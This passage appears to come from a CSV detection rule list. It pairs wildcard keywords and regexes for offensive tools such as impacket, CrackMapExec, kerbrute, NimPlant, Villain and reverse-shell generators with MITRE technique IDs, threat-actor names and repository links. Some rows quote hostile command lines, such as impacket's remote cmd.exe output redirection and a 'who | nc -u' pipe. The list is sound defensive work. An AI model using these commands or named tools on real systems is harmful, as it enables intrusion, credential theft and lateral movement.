tasklist /m > C:\Windows\Temp\*.tmp 2>&1*",".{0,1000}cmd\.exe\""\s\/C\stasklist\s\/m\s\>\sC\:\\Windows\\Temp\\.{0,1000}\.tmp\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38460" "*cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\_*>&1*",".{0,1000}cmd\.exe\""\s\/Q\s\/c\scd\s\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38461" "*cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__* 2>&1*",".{0,1000}cmd\.exe\""\s\/Q\s\/c\scd\s\\\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with dcomexec.py ","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38462" "*cmd.exe"" /Q /c whoami 1> \\127.0.0.1\ADMIN$\_*2>&1*",".{0,1000}cmd\.exe\""\s\/Q\s\/c\swhoami\s1\>\s\\\\127\.0\.0\.1\\ADMIN\$\\_.{0,1000}2\>\&1.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","observed with wmiexec.py","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38463" "*cmd.exe*/c powershell -windowst hidden *",".{0,1000}cmd\.exe.{0,1000}\/c\spowershell\s\-windowst\shidden\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","typo","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","38465" "*cmd/bruteforce.go*",".{0,1000}cmd\/bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","38470" "*cmd/bruteuser.go*",".{0,1000}cmd\/bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","38471" "*cmd/kubestroyer*",".{0,1000}cmd\/kubestroyer.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","N/A","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","38473" "*cmd/ligolo*",".{0,1000}cmd\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","38474" "*cmd/localrelay*",".{0,1000}cmd\/localrelay.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","38475" "*cmd/merlinagent/*",".{0,1000}cmd\/merlinagent\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","38476" 
"*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","38477" "*cmd/merlinagentdll/*",".{0,1000}cmd\/merlinagentdll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","38478" "*cmd/tsh.go*",".{0,1000}cmd\/tsh\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","38480" "*cmd/tshd.go*",".{0,1000}cmd\/tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","38481" "*cmd/unix/reverse_bash*",".{0,1000}cmd\/unix\/reverse_bash.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","38482" "*cmd/unix/reverse_python*",".{0,1000}cmd\/unix\/reverse_python.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","38483" "*cmd:who | nc -u *",".{0,1000}cmd\:who\s\|\snc\s\-u\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38484" "*cmd_executor *",".{0,1000}cmd_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","38485" "*cmd_powershell.cpp*",".{0,1000}cmd_powershell\.cpp.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","38486" "*cmd_shellcodex64.*",".{0,1000}cmd_shellcodex64\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","38487" "*cmd_shellcodex86.*",".{0,1000}cmd_shellcodex86\..{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","38488" "*Cmd-Execute-Assembly.*",".{0,1000}Cmd\-Execute\-Assembly\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38489" "*Cmd-Inline-Execute.*",".{0,1000}Cmd\-Inline\-Execute\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black 
Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38490" "*cmdinspector OFF*",".{0,1000}cmdinspector\sOFF.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","38491" "*cmdinspector ON*",".{0,1000}cmdinspector\sON.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","38492" "*CmdLineSpoofer.exe*",".{0,1000}CmdLineSpoofer\.exe.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","38494" "*CmdLineSpoofer.sln*",".{0,1000}CmdLineSpoofer\.sln.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","38495" "*CmdLineSpoofer-master*",".{0,1000}CmdLineSpoofer\-master.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","38496" "*cmdshell *",".{0,1000}cmdshell\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","38497" "*Cmd-Shinject.*",".{0,1000}Cmd\-Shinject\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38498" "*Cmd-Upload.*",".{0,1000}Cmd\-Upload\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38499" "*cme -d * -*",".{0,1000}cme\s\-d\s.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black 
Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38500" "*cme -d *localhost*",".{0,1000}cme\s\-d\s.{0,1000}localhost.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38501" "*cme*-macOS-latest-*",".{0,1000}cme.{0,1000}\-macOS\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","macOS default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38502" "*cme*-ubuntu-latest-*",".{0,1000}cme.{0,1000}\-ubuntu\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","ubuntu default compiled executable name for crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38503" "*cme*-windows-latest-*",".{0,1000}cme.{0,1000}\-windows\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38504" "*cme/cme.conf*",".{0,1000}cme\/cme\.conf.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38505" "*cme_bloodhound_output_*.txt*",".{0,1000}cme_bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38506" "*cme_dfscoerce_output_*.txt*",".{0,1000}cme_dfscoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - 
T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38507" "*cme_get-desc-users_pass_output_*",".{0,1000}cme_get\-desc\-users_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38508" "*cme_get-desc-users_pass_results*",".{0,1000}cme_get\-desc\-users_pass_results.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38509" "*cme_gpp_output_*.txt*",".{0,1000}cme_gpp_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38510" "*cme_ldap-checker_output_*",".{0,1000}cme_ldap\-checker_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - 
T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38511" "*cme_MachineAccountQuota_output_*",".{0,1000}cme_MachineAccountQuota_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38512" "*cme_ms17-010_output_*",".{0,1000}cme_ms17\-010_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38513" "*cme_mssql_priv_output_*.txt*",".{0,1000}cme_mssql_priv_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38514" "*cme_ntlmv1_output_*",".{0,1000}cme_ntlmv1_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - 
T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38515" "*cme_passpol_output_*.txt*",".{0,1000}cme_passpol_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38516" "*cme_petitpotam_output_*.txt*",".{0,1000}cme_petitpotam_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38517" "*cme_printnightmare_output_*.txt*",".{0,1000}cme_printnightmare_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - 